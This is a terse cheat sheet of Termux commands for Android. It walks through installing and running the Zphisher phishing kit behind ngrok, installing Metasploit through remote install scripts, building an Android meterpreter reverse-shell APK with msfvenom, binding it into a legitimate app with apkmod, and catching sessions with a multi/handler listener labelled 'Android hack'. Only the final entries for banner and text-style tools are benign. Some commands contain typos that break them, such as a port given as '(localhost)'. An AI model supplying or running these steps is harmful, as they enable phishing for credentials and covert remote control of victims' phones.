Termux commands


Zphisher install

  • apt install git

  • git clone https://github.com/htr-tech/zphisher

  • cd zphisher

  • chmod +x zphisher.sh

  • bash zphisher.sh

Zphisher open

  • cd zphisher

  • bash zphisher.sh

Ngrok install

  • apt update && apt upgrade

  • apt install wget

  • wget https://bin.equinox.io/c/4VmDzA7iaHb/ngrok-stable-linux-arm.tgz

  • ls

  • tar xvzf ngrok-stable-linux-arm.tgz

  • ls

  • ./ngrok authtoken (your authtoken)

  • ./ngrok http 8080

Ngrok open

  • chmod +x ngrok

  • ./ngrok http 8080

Metasploit install

  • apt update && apt upgrade

  • pkg install git curl wget nmap -y && wget https://github.com/Hax4us/TermuxBlack/raw/master/install.sh && chmod +x install.sh && ./install.sh -i && pkg install ruby2 && wget https://raw.githubusercontent.com/Hax4us/Metasploit_termux/master/metasploit.sh && chmod +x metasploit.sh && ./metasploit.sh

  • msfconsole

Metasploit open

  • msfconsole

Local ip address

  • ifconfig

Payload Create

  • msfvenom -p android/meterpreter/reversetcp LHOST=(localhost) LPORT=(localhost) R >/sdcard/(payloadname).apk

Payload baind in org apk

  • apkmod -b -i /sdcard/(orginal).apk -o /sdcard/kpayload).apk lhost=(localhost) lport=(localport)

Android hack

  • use exploit/multi/handler

  • set payload android/meterpreter/reverse_tcp

  • set lhost 0.0.0.0

  • set lport 5900

  • exploit

Sessions runing

  • sessions -i 1

  • systeminfo

Name banner

  • apt update && apt upgrade -y && pkg install git && git clone https://github.com/remo7777/T-Header && cd T-Header && bash t-header.sh

Text style change

  • git clone https://github.com/htr-tech/tstyle

  • cd tstyle

  • bash setup.sh

  • tstyle

Text style open

  • tstyle